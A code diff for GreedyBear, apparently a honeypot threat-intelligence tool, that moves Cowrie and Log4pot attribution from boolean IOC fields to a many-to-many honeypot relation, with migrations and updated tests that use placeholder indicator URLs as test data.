@@ -236,8 +233,6 @@ def feeds_response(iocs, feed_params, valid_feed_types, dict_only=False, verbose
"last_seen",
"attack_count",
"interaction_count",
- "log4j",
- "cowrie",
"scanner",
"payload_request",
"ip_reputation",
@@ -250,15 +245,11 @@ def feeds_response(iocs, feed_params, valid_feed_types, dict_only=False, verbose
"recurrence_probability",
"expected_interactions",
}
+
+ # Collect values; `honeypots` will contain the list of associated honeypot names
iocs = (ioc_as_dict(ioc, required_fields) for ioc in iocs) if isinstance(iocs, list) else iocs.values(*required_fields)
for ioc in iocs:
- ioc_feed_type = []
- if ioc[Honeypots.LOG4J.value]:
- ioc_feed_type.append(Honeypots.LOG4J.value)
- if ioc[Honeypots.COWRIE.value]:
- ioc_feed_type.append(Honeypots.COWRIE.value)
- if len(ioc["honeypots"]):
- ioc_feed_type.extend([hp.lower() for hp in ioc["honeypots"] if hp is not None])
+ ioc_feed_type = [hp.lower() for hp in ioc.get("honeypots", []) if hp]
data_ = ioc | {
"first_seen": ioc["first_seen"].strftime("%Y-%m-%d"),
diff --git a/frontend/src/components/feeds/Feeds.jsx b/frontend/src/components/feeds/Feeds.jsx
index 6b03bfe7..f81c276c 100644
--- a/frontend/src/components/feeds/Feeds.jsx
+++ b/frontend/src/components/feeds/Feeds.jsx
@@ -14,11 +14,7 @@ import { feedsTableColumns } from "./tableColumns";
import { FEEDS_LICENSE } from "../../constants";
// costants
-const feedTypeChoices = [
- { label: "All", value: "all" },
- { label: "Log4j", value: "log4j" },
- { label: "Cowrie", value: "cowrie" },
-];
+const feedTypeChoices = [{ label: "All", value: "all" }];
const attackTypeChoices = [
{ label: "All", value: "all" },
diff --git a/frontend/tests/components/feeds/Feeds.test.jsx b/frontend/tests/components/feeds/Feeds.test.jsx
index 38a4ea80..53b5f162 100644
--- a/frontend/tests/components/feeds/Feeds.test.jsx
+++ b/frontend/tests/components/feeds/Feeds.test.jsx
@@ -38,11 +38,16 @@ jest.mock("@certego/certego-ui", () => {
...originalModule,
useAxiosComponentLoader: jest.fn(() => [
- ["Honeytrap", "Glutton", "CitrixHoneypot"],
+ ["Honeytrap", "Glutton", "CitrixHoneypot", "Log4j", "Cowrie"],
loader,
]),
- useDataTable: jest.fn(() => [feeds, , jest.fn()]),
+ useDataTable: jest.fn(() => [
+ feeds,
+ ,
+ jest.fn(),
+ jest.fn(),
+ ]),
};
});
diff --git a/greedybear/admin.py b/greedybear/admin.py
index 8d5bcee6..830e34c6 100644
--- a/greedybear/admin.py
+++ b/greedybear/admin.py
@@ -113,8 +113,6 @@ class IOCModelAdmin(admin.ModelAdmin):
"related_urls",
"scanner",
"payload_request",
- "log4j",
- "cowrie",
"general_honeypots",
"ip_reputation",
"firehol_categories",
@@ -124,8 +122,6 @@ class IOCModelAdmin(admin.ModelAdmin):
]
list_filter = [
"type",
- "log4j",
- "cowrie",
"scanner",
"payload_request",
"ip_reputation",
diff --git a/greedybear/cronjobs/extraction/strategies/cowrie.py b/greedybear/cronjobs/extraction/strategies/cowrie.py
index 65afa93a..71738559 100644
--- a/greedybear/cronjobs/extraction/strategies/cowrie.py
+++ b/greedybear/cronjobs/extraction/strategies/cowrie.py
@@ -105,9 +105,8 @@ def extract_from_hits(self, hits: list[dict]) -> None:
def _get_scanners(self, hits: list[dict]) -> None:
"""Extract scanner IPs and sessions."""
for ioc in iocs_from_hits(hits):
- ioc.cowrie = True
self.log.info(f"found IP {ioc.name} by honeypot cowrie")
- ioc_record = self.ioc_processor.add_ioc(ioc, attack_type=SCANNER)
+ ioc_record = self.ioc_processor.add_ioc(ioc, attack_type=SCANNER, general_honeypot_name="Cowrie")
if ioc_record:
self.ioc_records.append(ioc_record)
threatfox_submission(ioc_record, ioc.related_urls, self.log)
@@ -146,10 +145,9 @@ def _extract_possible_payload_in_messages(self, hits: list[dict]) -> None:
ioc = IOC(
name=payload_hostname,
type=get_ioc_type(payload_hostname),
- cowrie=True,
related_urls=[payload_url],
)
- self.ioc_processor.add_ioc(ioc, attack_type=PAYLOAD_REQUEST)
+ self.ioc_processor.add_ioc(ioc, attack_type=PAYLOAD_REQUEST, general_honeypot_name="Cowrie")
self._add_fks(scanner_ip, payload_hostname)
self.payloads_in_message += 1
@@ -181,10 +179,9 @@ def _get_url_downloads(self, hits: list[dict]) -> None:
ioc = IOC(
name=hostname,
type=get_ioc_type(hostname),
- cowrie=True,
related_urls=[download_url],
)
- ioc_record = self.ioc_processor.add_ioc(ioc, attack_type=PAYLOAD_REQUEST)
+ ioc_record = self.ioc_processor.add_ioc(ioc, attack_type=PAYLOAD_REQUEST, general_honeypot_name="Cowrie")
if ioc_record:
self.added_url_downloads += 1
threatfox_submission(ioc_record, ioc.related_urls, self.log)
diff --git a/greedybear/cronjobs/extraction/strategies/log4pot.py b/greedybear/cronjobs/extraction/strategies/log4pot.py
index c2e92bb1..879b14cb 100644
--- a/greedybear/cronjobs/extraction/strategies/log4pot.py
+++ b/greedybear/cronjobs/extraction/strategies/log4pot.py
@@ -80,8 +80,8 @@ def extract_from_hits(self, hits: list[dict]) -> None:
# add scanner
if scanner_ip:
- ioc = IOC(name=scanner_ip, type=get_ioc_type(scanner_ip), log4j=True)
- self.ioc_processor.add_ioc(ioc, attack_type=SCANNER)
+ ioc = IOC(name=scanner_ip, type=get_ioc_type(scanner_ip))
+ self.ioc_processor.add_ioc(ioc, attack_type=SCANNER, general_honeypot_name="Log4pot")
added_scanners += 1
# add first URL
@@ -90,10 +90,9 @@ def extract_from_hits(self, hits: list[dict]) -> None:
ioc = IOC(
name=scanner_ip,
type=get_ioc_type(scanner_ip),
- log4j=True,
related_urls=related_urls,
)
- self.ioc_processor.add_ioc(ioc, attack_type=SCANNER)
+ self.ioc_processor.add_ioc(ioc, attack_type=SCANNER, general_honeypot_name="Log4pot")
added_payloads += 1
# add hidden URL
@@ -102,10 +101,9 @@ def extract_from_hits(self, hits: list[dict]) -> None:
ioc = IOC(
name=hostname,
type=get_ioc_type(hostname),
- log4j=True,
related_urls=related_urls,
)
- self.ioc_processor.add_ioc(ioc, attack_type=PAYLOAD_REQUEST)
+ self.ioc_processor.add_ioc(ioc, attack_type=PAYLOAD_REQUEST, general_honeypot_name="Log4pot")
added_hidden_payloads += 1
# once all have added, we can add the foreign keys
diff --git a/greedybear/cronjobs/extraction/utils.py b/greedybear/cronjobs/extraction/utils.py
index cb421cc9..abd59a44 100644
--- a/greedybear/cronjobs/extraction/utils.py
+++ b/greedybear/cronjobs/extraction/utils.py
@@ -215,13 +215,7 @@ def threatfox_submission(ioc_record: IOC, related_urls: list, log: Logger) -> No
headers = {"Auth-Key": settings.THREATFOX_API_KEY}
log.info(f"submitting IOC {urls_to_submit} to Threatfox")
- seen_honeypots = []
- if ioc_record.cowrie:
- seen_honeypots.append("cowrie")
- if ioc_record.log4j:
- seen_honeypots.append("log4pot")
- for honeypot in ioc_record.general_honeypot.all():
- seen_honeypots.append(honeypot.name)
+ seen_honeypots = [hp.name for hp in ioc_record.general_honeypot.all()]
seen_honeypots_str = ", ".join(seen_honeypots)
json_data = {
diff --git a/greedybear/cronjobs/repositories/ioc.py b/greedybear/cronjobs/repositories/ioc.py
index 29032cea..a63bd354 100644
--- a/greedybear/cronjobs/repositories/ioc.py
+++ b/greedybear/cronjobs/repositories/ioc.py
@@ -2,7 +2,7 @@
from django.contrib.postgres.aggregates import ArrayAgg
from django.db import IntegrityError
-from django.db.models import F, Q
+from django.db.models import F
from greedybear.models import IOC, GeneralHoneypot
@@ -15,13 +15,10 @@ class IocRepository:
and updated when new honeypots are created.
"""
- SPECIAL_HONEYPOTS = frozenset({"Cowrie", "Log4pot"})
-
def __init__(self):
"""Initialize the repository and populate the honeypot cache from the database."""
self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
self._honeypot_cache = {self._normalize_name(hp.name): hp.active for hp in GeneralHoneypot.objects.all()}
- self._honeypot_cache.update({self._normalize_name(name): True for name in self.SPECIAL_HONEYPOTS})
def _normalize_name(self, name: str) -> str:
"""Normalize honeypot names for consistent cache and DB usage."""
@@ -123,7 +120,6 @@ def is_empty(self) -> bool:
def is_enabled(self, honeypot_name: str) -> bool:
"""
Check if a honeypot is enabled.
- Special honeypots (Cowrie, Log4pot) are always enabled.
General honeypots are enabled based on their active flag.
Args:
@@ -178,7 +174,7 @@ def get_scanners_for_scoring(self, score_fields: list[str]) -> list[IOC]:
Returns:
QuerySet of IOC objects with only name and score fields loaded.
"""
- return IOC.objects.filter(Q(cowrie=True) | Q(log4j=True) | Q(general_honeypot__active=True)).filter(scanner=True).distinct().only("name", *score_fields)
+ return IOC.objects.filter(general_honeypot__active=True).filter(scanner=True).distinct().only("name", *score_fields)
def get_scanners_by_pks(self, primary_keys: set[int]):
"""
@@ -214,7 +210,7 @@ def get_recent_scanners(self, cutoff_date, days_lookback: int = 30):
QuerySet of IOC objects with prefetched relationships and annotations.
"""
return (
- IOC.objects.filter(Q(cowrie=True) | Q(log4j=True) | Q(general_honeypot__active=True))
+ IOC.objects.filter(general_honeypot__active=True)
.filter(last_seen__gte=cutoff_date, scanner=True)
.prefetch_related("general_honeypot")
.annotate(value=F("name"))
diff --git a/greedybear/migrations/0030_migrate_cowrie_log4j.py b/greedybear/migrations/0030_migrate_cowrie_log4j.py
new file mode 100644
index 00000000..48eb58e1
--- /dev/null
+++ b/greedybear/migrations/0030_migrate_cowrie_log4j.py
@@ -0,0 +1,41 @@
+"""
+Generated data migration to move `cowrie` and `log4j` boolean flags
+into the `GeneralHoneypot` many-to-many relationship.
+
+This migration ensures that `Cowrie` and `Log4pot` entries exist in
+`GeneralHoneypot` and for each IOC that had the boolean flags set it
+adds the corresponding honeypot to the `general_honeypot` M2M.
+"""
+from django.db import migrations
+
+
+def migrate_cowrie_log4j_to_general(apps, schema_editor):
+ GeneralHoneypot = apps.get_model("greedybear", "GeneralHoneypot")
+ IOC = apps.get_model("greedybear", "IOC")
+
+ # Ensure honeypot entries exist
+ cowrie_hp, _ = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})
+ log4pot_hp, _ = GeneralHoneypot.objects.get_or_create(name="Log4pot", defaults={"active": True})
+
+ # Migrate existing IOC rows
+ for ioc in IOC.objects.all():
+ try:
+ # Some historical DBs might not yet have these fields; use getattr with default
+ if getattr(ioc, "cowrie", False):
+ ioc.general_honeypot.add(cowrie_hp)
+ if getattr(ioc, "log4j", False):
+ ioc.general_honeypot.add(log4pot_hp)
+ except Exception:
+ # Be resilient to odd DB states; continue migrating other rows
+ continue
+
+
+class Migration(migrations.Migration):
+
+ dependencies = [
+ ("greedybear", "0029_remove_hardcoded_honeypots"),
+ ]
+
+ operations = [
+ migrations.RunPython(migrate_cowrie_log4j_to_general, reverse_code=migrations.RunPython.noop),
+ ]
diff --git a/greedybear/migrations/0031_remove_cowrie_log4j_fields.py b/greedybear/migrations/0031_remove_cowrie_log4j_fields.py
new file mode 100644
index 00000000..e824e715
--- /dev/null
+++ b/greedybear/migrations/0031_remove_cowrie_log4j_fields.py
@@ -0,0 +1,18 @@
+"""
+Schema migration to remove the legacy `cowrie` and `log4j` boolean
+fields from the `IOC` model now that they are represented by the
+`general_honeypot` many-to-many relation.
+"""
+from django.db import migrations
+
+
+class Migration(migrations.Migration):
+
+ dependencies = [
+ ("greedybear", "0030_migrate_cowrie_log4j"),
+ ]
+
+ operations = [
+ migrations.RemoveField(model_name="ioc", name="cowrie"),
+ migrations.RemoveField(model_name="ioc", name="log4j"),
+ ]
diff --git a/greedybear/models.py b/greedybear/models.py
index 2f0d6a76..dc71c6be 100644
--- a/greedybear/models.py
+++ b/greedybear/models.py
@@ -60,8 +60,6 @@ class IOC(models.Model):
number_of_days_seen = models.IntegerField(default=1)
attack_count = models.IntegerField(default=1)
interaction_count = models.IntegerField(default=1)
- log4j = models.BooleanField(blank=False, default=False)
- cowrie = models.BooleanField(blank=False, default=False)
# FEEDS - list of honeypots from general list, from which the IOC was detected
general_honeypot = models.ManyToManyField(GeneralHoneypot, blank=True)
scanner = models.BooleanField(blank=False, default=False)
diff --git a/tests/__init__.py b/tests/__init__.py
index a22d4d87..690676f3 100644
--- a/tests/__init__.py
+++ b/tests/__init__.py
@@ -24,6 +24,11 @@ def setUpTestData(cls):
cls.ddospot = GeneralHoneypot.objects.get_or_create(name="Ddospot", defaults={"active": False})[0]
cls.current_time = datetime.now()
+
+ # Create honeypots for Cowrie and Log4pot (replacing boolean fields)
+ cls.cowrie_hp = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})[0]
+ cls.log4pot_hp = GeneralHoneypot.objects.get_or_create(name="Log4pot", defaults={"active": True})[0]
+
cls.ioc = IOC.objects.create(
name="140.246.171.141",
type=IocType.IP.value,
@@ -33,8 +38,6 @@ def setUpTestData(cls):
number_of_days_seen=1,
attack_count=1,
interaction_count=1,
- log4j=True,
- cowrie=True,
scanner=True,
payload_request=True,
related_urls=[],
@@ -55,8 +58,6 @@ def setUpTestData(cls):
number_of_days_seen=1,
attack_count=1,
interaction_count=1,
- log4j=True,
- cowrie=True,
scanner=True,
payload_request=True,
related_urls=[],
@@ -77,8 +78,6 @@ def setUpTestData(cls):
number_of_days_seen=1,
attack_count=1,
interaction_count=1,
- log4j=False,
- cowrie=True,
scanner=True,
payload_request=True,
related_urls=[],
@@ -99,8 +98,6 @@ def setUpTestData(cls):
number_of_days_seen=1,
attack_count=1,
interaction_count=1,
- log4j=True,
- cowrie=False,
scanner=False,
payload_request=True,
related_urls=[],
@@ -114,11 +111,18 @@ def setUpTestData(cls):
cls.ioc.general_honeypot.add(cls.heralding) # FEEDS
cls.ioc.general_honeypot.add(cls.ciscoasa) # FEEDS
+ cls.ioc.general_honeypot.add(cls.cowrie_hp) # Cowrie honeypot
+ cls.ioc.general_honeypot.add(cls.log4pot_hp) # Log4pot honeypot
cls.ioc.save()
cls.ioc_2.general_honeypot.add(cls.heralding) # FEEDS
cls.ioc_2.general_honeypot.add(cls.ciscoasa) # FEEDS
+ cls.ioc_2.general_honeypot.add(cls.cowrie_hp) # Cowrie honeypot
+ cls.ioc_2.general_honeypot.add(cls.log4pot_hp) # Log4pot honeypot
cls.ioc_2.save()
+ cls.ioc_3.general_honeypot.add(cls.cowrie_hp) # Cowrie honeypot
+ cls.ioc_3.save()
cls.ioc_domain.general_honeypot.add(cls.heralding) # FEEDS
+ cls.ioc_domain.general_honeypot.add(cls.log4pot_hp) # Log4pot honeypot
cls.ioc_domain.save()
cls.cmd_seq = ["cd foo", "ls -la"]
diff --git a/tests/api/test_feed_types.py b/tests/api/test_feed_types.py
new file mode 100644
index 00000000..35118fc9
--- /dev/null
+++ b/tests/api/test_feed_types.py
@@ -0,0 +1,156 @@
+"""
+Tests for API feed type handling after migration from boolean fields.
+"""
+
+from django.test import override_settings
+from rest_framework.test import APIClient
+
+from greedybear.models import IOC, GeneralHoneypot, IocType
+from tests import CustomTestCase
+
+
+class FeedTypeAPITestCase(CustomTestCase):
+ """Test API feed handling with GeneralHoneypot M2M instead of boolean fields."""
+
+ def setUp(self):
+ self.client = APIClient()
+ self.client.force_authenticate(user=self.superuser)
+
+ # Ensure Cowrie and Log4pot honeypots exist
+ self.cowrie_hp = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})[0]
+ self.log4pot_hp = GeneralHoneypot.objects.get_or_create(name="Log4pot", defaults={"active": True})[0]
+
+ def test_feed_type_derived_from_m2m(self):
+ """Verify feed_type is derived from general_honeypot M2M."""
+ response = self.client.get("/api/feeds/all/all/recent.json")
+ self.assertEqual(response.status_code, 200)
+
+ iocs = response.json()["iocs"]
+ target_ioc = next((i for i in iocs if i["value"] == self.ioc.name), None)
+ self.assertIsNotNone(target_ioc)
+
+ # Feed types should be derived from M2M
+ feed_types = set(target_ioc["feed_type"])
+ self.assertIn("log4pot", feed_types)
+ self.assertIn("cowrie", feed_types)
+ self.assertIn("heralding", feed_types)
+ self.assertIn("ciscoasa", feed_types)
+
+ def test_feed_filter_by_cowrie(self):
+ """Verify filtering by cowrie feed type works via M2M."""
+ # Include mass scanners and tor exit nodes since test IOCs have those reputations
+ response = self.client.get("/api/feeds/cowrie/all/recent.json?include_mass_scanners=true&include_tor_exit_nodes=true")
+ self.assertEqual(response.status_code, 200)
+
+ iocs = response.json()["iocs"]
+ ioc_names = [ioc["value"] for ioc in iocs]
+
+ # Should include IOCs associated with Cowrie honeypot
+ self.assertIn(self.ioc.name, ioc_names)
+ self.assertIn(self.ioc_2.name, ioc_names)
+ self.assertIn(self.ioc_3.name, ioc_names)
+
+ def test_feed_filter_by_log4pot(self):
+ """Verify filtering by log4pot feed type works via M2M."""
+ # Include mass scanners since ioc_2 has that reputation
+ response = self.client.get("/api/feeds/log4pot/all/recent.json?include_mass_scanners=true")
+ self.assertEqual(response.status_code, 200)
+
+ iocs = response.json()["iocs"]
+ ioc_names = [ioc["value"] for ioc in iocs]
+
+ # Should include IOCs associated with Log4pot honeypot
+ self.assertIn(self.ioc.name, ioc_names)
+ self.assertIn(self.ioc_2.name, ioc_names)
+
+ def test_feed_valid_types_includes_all_active_honeypots(self):
+ """Verify valid feed types include all active honeypots."""
+ from api.views.utils import get_valid_feed_types
+
+ valid_types = get_valid_feed_types()
+
+ # Should include all active honeypots (case-insensitive)
+ self.assertIn("all", valid_types)
+ self.assertIn("cowrie", valid_types)
+ self.assertIn("log4pot", valid_types)
+ self.assertIn("heralding", valid_types)
+ self.assertIn("ciscoasa", valid_types)
+
+ def test_inactive_honeypot_not_in_valid_types(self):
+ """Verify inactive honeypots are not included in valid feed types."""
+ from api.views.utils import get_valid_feed_types
+
+ valid_types_before = get_valid_feed_types()
+
+ # Deactivate a honeypot
+ self.ddospot.active = False
+ self.ddospot.save()
+
+ valid_types_after = get_valid_feed_types()
+
+ # Ddospot was already inactive, should not be in either
+ self.assertNotIn("ddospot", valid_types_before)
+ self.assertNotIn("ddospot", valid_types_after)
+
+ def test_feed_type_no_normalization_log4pot(self):
+ """Verify Log4pot is NOT normalized to log4j in feed output."""
+ # Create an IOC with only Log4pot
+ ioc = IOC.objects.create(
+ name="100.200.100.200",
+ type=IocType.IP.value,
+ scanner=True,
+ )
+ ioc.general_honeypot.add(self.log4pot_hp)
+
+ response = self.client.get("/api/feeds/all/all/recent.json")
+ self.assertEqual(response.status_code, 200)
+
+ iocs = response.json()["iocs"]
+ target_ioc = next((i for i in iocs if i["value"] == ioc.name), None)
+ self.assertIsNotNone(target_ioc)
+
+ # Should contain "log4pot" and NOT "log4j"
+ self.assertIn("log4pot", target_ioc["feed_type"])
+ self.assertNotIn("log4j", target_ioc["feed_type"])
+
+ def test_feed_output_without_boolean_fields(self):
+ """Verify feed output doesn't contain legacy boolean fields."""
+ response = self.client.get("/api/feeds/all/all/recent.json")
+ self.assertEqual(response.status_code, 200)
+
+ iocs = response.json()["iocs"]
+ if iocs:
+ first_ioc = iocs[0]
+ # These boolean fields should not exist in the output
+ self.assertNotIn("log4j", first_ioc)
+ self.assertNotIn("cowrie", first_ioc)
+
+ def test_enrichment_output_includes_honeypot_list(self):
+ """Verify enrichment endpoint includes honeypot list."""
+ response = self.client.get(f"/api/enrichment?query={self.ioc.name}")
+ self.assertEqual(response.status_code, 200)
+ self.assertTrue(response.json()["found"])
+
+ # Should have general_honeypot list (serialized as list of strings)
+ honeypots = response.json()["ioc"]["general_honeypot"]
+ self.assertIsInstance(honeypots, list)
+ self.assertGreater(len(honeypots), 0)
+
+ # Check that honeypot names are in the list
+ self.assertIn("Cowrie", honeypots)
+ self.assertIn("Log4pot", honeypots)
+
+ @override_settings(FEEDS_LICENSE="https://example.com/license")
+ def test_feed_with_multiple_honeypots(self):
+ """Verify IOC with multiple honeypots shows all in feed_type."""
+ response = self.client.get("/api/feeds/all/all/recent.json")
+ self.assertEqual(response.status_code, 200)
+
+ iocs = response.json()["iocs"]
+ target_ioc = next((i for i in iocs if i["value"] == self.ioc.name), None)
+ self.assertIsNotNone(target_ioc)
+
+ # Should have multiple feed types from all associated honeypots
+ feed_types = target_ioc["feed_type"]
+ self.assertGreater(len(feed_types), 1)
+ self.assertIsInstance(feed_types, list)
diff --git a/tests/greedybear/cronjobs/test_monitor_honeypots.py b/tests/greedybear/cronjobs/test_monitor_honeypots.py
index 5b6bf160..b1590ea1 100644
--- a/tests/greedybear/cronjobs/test_monitor_honeypots.py
+++ b/tests/greedybear/cronjobs/test_monitor_honeypots.py
@@ -17,32 +17,32 @@ def test_run_all_active_honeypots_are_hit(self, mock_elastic_repo_class):
# Run the cronjob
cronjob.execute()
- self.assertEqual(mock_elastic_repo.has_honeypot_been_hit.call_count, 2)
+ self.assertEqual(mock_elastic_repo.has_honeypot_been_hit.call_count, 4)
info_calls = [call[0][0] for call in cronjob.log.info.call_args_list]
warning_calls = [call[0][0] for call in cronjob.log.warning.call_args_list]
- self.assertEqual(len([msg for msg in info_calls if "logs available" in msg]), 2)
+ self.assertEqual(len([msg for msg in info_calls if "logs available" in msg]), 4)
self.assertEqual(len(warning_calls), 0)
@patch("greedybear.cronjobs.monitor_honeypots.ElasticRepository")
def test_run_some_active_honeypots_are_hit(self, mock_elastic_repo_class):
# Setup mock responses
mock_elastic_repo = mock_elastic_repo_class.return_value
- mock_elastic_repo.has_honeypot_been_hit.side_effect = [True, False]
+ mock_elastic_repo.has_honeypot_been_hit.side_effect = [True, False, True, False]
cronjob = MonitorHoneypots(minutes_back=60)
cronjob.log = MagicMock()
# Run the cronjob
cronjob.execute()
- self.assertEqual(mock_elastic_repo.has_honeypot_been_hit.call_count, 2)
+ self.assertEqual(mock_elastic_repo.has_honeypot_been_hit.call_count, 4)
info_calls = [call[0][0] for call in cronjob.log.info.call_args_list]
warning_calls = [call[0][0] for call in cronjob.log.warning.call_args_list]
- self.assertEqual(len([msg for msg in info_calls if "logs available" in msg]), 1)
- self.assertEqual(len(warning_calls), 1)
+ self.assertEqual(len([msg for msg in info_calls if "logs available" in msg]), 2)
+ self.assertEqual(len(warning_calls), 2)
@patch("greedybear.cronjobs.monitor_honeypots.ElasticRepository")
def test_run_no_active_honeypots_are_hit(self, mock_elastic_repo_class):
@@ -55,10 +55,10 @@ def test_run_no_active_honeypots_are_hit(self, mock_elastic_repo_class):
# Run the cronjob
cronjob.execute()
- self.assertEqual(mock_elastic_repo.has_honeypot_been_hit.call_count, 2)
+ self.assertEqual(mock_elastic_repo.has_honeypot_been_hit.call_count, 4)
info_calls = [call[0][0] for call in cronjob.log.info.call_args_list]
warning_calls = [call[0][0] for call in cronjob.log.warning.call_args_list]
self.assertEqual(len([msg for msg in info_calls if "logs available" in msg]), 0)
- self.assertEqual(len(warning_calls), 2)
+ self.assertEqual(len(warning_calls), 4)
diff --git a/tests/test_cowrie_extraction.py b/tests/test_cowrie_extraction.py
index 1a9b96fe..b559d726 100644
--- a/tests/test_cowrie_extraction.py
+++ b/tests/test_cowrie_extraction.py
@@ -117,8 +117,9 @@ def test_extract_payload_in_messages_with_url(self):
ioc_arg = call_args[0][0]
self.assertEqual(ioc_arg.name, "evil.com")
- self.assertTrue(ioc_arg.cowrie)
self.assertIn("http://evil.com/malware.exe", ioc_arg.related_urls)
+ # Verify honeypot is set via general_honeypot_name argument
+ self.assertEqual(call_args.kwargs.get("general_honeypot_name"), "Cowrie")
def test_extract_payload_in_messages_no_url(self):
"""Test extraction when message has no URL."""
@@ -331,7 +332,6 @@ def test_deduplicate_command_sequence_existing(self):
def test_extract_from_hits_integration(self, mock_iocs_from_hits):
"""Test the main extract_from_hits coordination."""
mock_ioc = Mock(name="1.2.3.4")
- mock_ioc.cowrie = False
mock_iocs_from_hits.return_value = [mock_ioc]
mock_ioc_record = Mock()
@@ -343,6 +343,7 @@ def test_extract_from_hits_integration(self, mock_iocs_from_hits):
with patch.object(self.strategy, "_extract_possible_payload_in_messages"):
self.strategy.extract_from_hits(hits)
- # Verify scanner was processed
- self.assertTrue(mock_ioc.cowrie)
+ # Verify scanner was processed with Cowrie as honeypot
self.strategy.ioc_processor.add_ioc.assert_called()
+ call_args = self.strategy.ioc_processor.add_ioc.call_args
+ self.assertEqual(call_args.kwargs.get("general_honeypot_name"), "Cowrie")
diff --git a/tests/test_extraction_utils.py b/tests/test_extraction_utils.py
index 7c6f56ea..558e76d3 100644
--- a/tests/test_extraction_utils.py
+++ b/tests/test_extraction_utils.py
@@ -547,11 +547,9 @@ class ThreatfoxSubmissionTestCase(ExtractionTestCase):
def setUp(self):
self.mock_log = Mock()
- def _create_mock_payload_request(self, cowrie=False, log4j=False):
+ def _create_mock_payload_request(self):
mock = self._create_mock_ioc()
mock.payload_request = True
- mock.cowrie = cowrie
- mock.log4j = log4j
mock.general_honeypot.all.return_value = []
return mock
@@ -579,7 +577,10 @@ def test_skips_urls_without_path(self, mock_settings):
def test_submits_urls_with_path(self, mock_settings, mock_post):
mock_settings.THREATFOX_API_KEY = "test-key"
mock_post.return_value = Mock(text='{"status": "ok"}')
- ioc_record = self._create_mock_payload_request(cowrie=True)
+ mock_honeypot_cowrie = Mock()
+ mock_honeypot_cowrie.name = "Cowrie"
+ ioc_record = self._create_mock_payload_request()
+ ioc_record.general_honeypot.all.return_value = [mock_honeypot_cowrie]
threatfox_submission(ioc_record, ["http://malicious.com/payload.sh"], self.mock_log)
mock_post.assert_called_once()
call_kwargs = mock_post.call_args[1]
@@ -591,15 +592,19 @@ def test_submits_urls_with_path(self, mock_settings, mock_post):
def test_includes_honeypot_names_in_comment(self, mock_settings, mock_post):
mock_settings.THREATFOX_API_KEY = "test-key"
mock_post.return_value = Mock(text='{"status": "ok"}')
- ioc_record = self._create_mock_payload_request(cowrie=True, log4j=True)
- mock_honeypot = Mock()
- mock_honeypot.name = "Dionaea"
- ioc_record.general_honeypot.all.return_value = [mock_honeypot]
+ ioc_record = self._create_mock_payload_request()
+ mock_honeypot_cowrie = Mock()
+ mock_honeypot_cowrie.name = "Cowrie"
+ mock_honeypot_log4pot = Mock()
+ mock_honeypot_log4pot.name = "Log4pot"
+ mock_honeypot_dionaea = Mock()
+ mock_honeypot_dionaea.name = "Dionaea"
+ ioc_record.general_honeypot.all.return_value = [mock_honeypot_cowrie, mock_honeypot_log4pot, mock_honeypot_dionaea]
threatfox_submission(ioc_record, ["http://malicious.com/payload.sh"], self.mock_log)
call_kwargs = mock_post.call_args[1]
comment = call_kwargs["json"]["comment"]
- self.assertIn("cowrie", comment)
- self.assertIn("log4pot", comment)
+ self.assertIn("Cowrie", comment)
+ self.assertIn("Log4pot", comment)
self.assertIn("Dionaea", comment)
@patch("greedybear.cronjobs.extraction.utils.requests.post")
diff --git a/tests/test_ioc_repository.py b/tests/test_ioc_repository.py
index 56ec7b7f..3e69ee9d 100644
--- a/tests/test_ioc_repository.py
+++ b/tests/test_ioc_repository.py
@@ -134,13 +134,13 @@ def test_is_ready_for_extraction_creates_and_enables(self):
self.assertTrue(GeneralHoneypot.objects.filter(name="FooPot").exists())
def test_is_ready_for_extraction_case_insensitive(self):
- GeneralHoneypot.objects.create(name="Cowrie", active=True)
+ GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})
result = self.repo.is_ready_for_extraction("cowrie")
self.assertTrue(result)
self.assertEqual(GeneralHoneypot.objects.filter(name__iexact="cowrie").count(), 1)
def test_get_hp_by_name_insensitive(self):
- GeneralHoneypot.objects.create(name="Cowrie", active=True)
+ GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})
result = self.repo.get_hp_by_name("cowrie")
self.assertIsNotNone(result)
@@ -212,8 +212,12 @@ def test_honeypot_unique_constraint_case_insensitive(self):
def test_get_scanners_for_scoring_returns_scanners(self):
# Create scanners
- IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True)
- IOC.objects.create(name="5.6.7.8", type="ip", scanner=True, log4j=True)
+ cowrie_hp = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})[0]
+ log4pot_hp = GeneralHoneypot.objects.get_or_create(name="Log4pot", defaults={"active": True})[0]
+ ioc1 = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True)
+ ioc1.general_honeypot.add(cowrie_hp)
+ ioc2 = IOC.objects.create(name="5.6.7.8", type="ip", scanner=True)
+ ioc2.general_honeypot.add(log4pot_hp)
result = self.repo.get_scanners_for_scoring(["recurrence_probability", "expected_interactions"])
@@ -222,7 +226,9 @@ def test_get_scanners_for_scoring_returns_scanners(self):
self.assertIn("5.6.7.8", names)
def test_get_scanners_for_scoring_excludes_non_scanners(self):
- IOC.objects.create(name="1.2.3.4", type="ip", scanner=False, cowrie=True)
+ cowrie_hp = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})[0]
+ ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=False)
+ ioc.general_honeypot.add(cowrie_hp)
result = self.repo.get_scanners_for_scoring(["recurrence_probability"])
@@ -230,7 +236,9 @@ def test_get_scanners_for_scoring_excludes_non_scanners(self):
self.assertNotIn("1.2.3.4", names)
def test_get_scanners_for_scoring_only_loads_specified_fields(self):
- IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, attack_count=100)
+ cowrie_hp = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})[0]
+ ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, attack_count=100)
+ ioc.general_honeypot.add(cowrie_hp)
result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
@@ -268,8 +276,11 @@ def test_get_recent_scanners_returns_recent_only(self):
recent_date = datetime.now() - timedelta(days=5)
old_date = datetime.now() - timedelta(days=40)
- IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=recent_date)
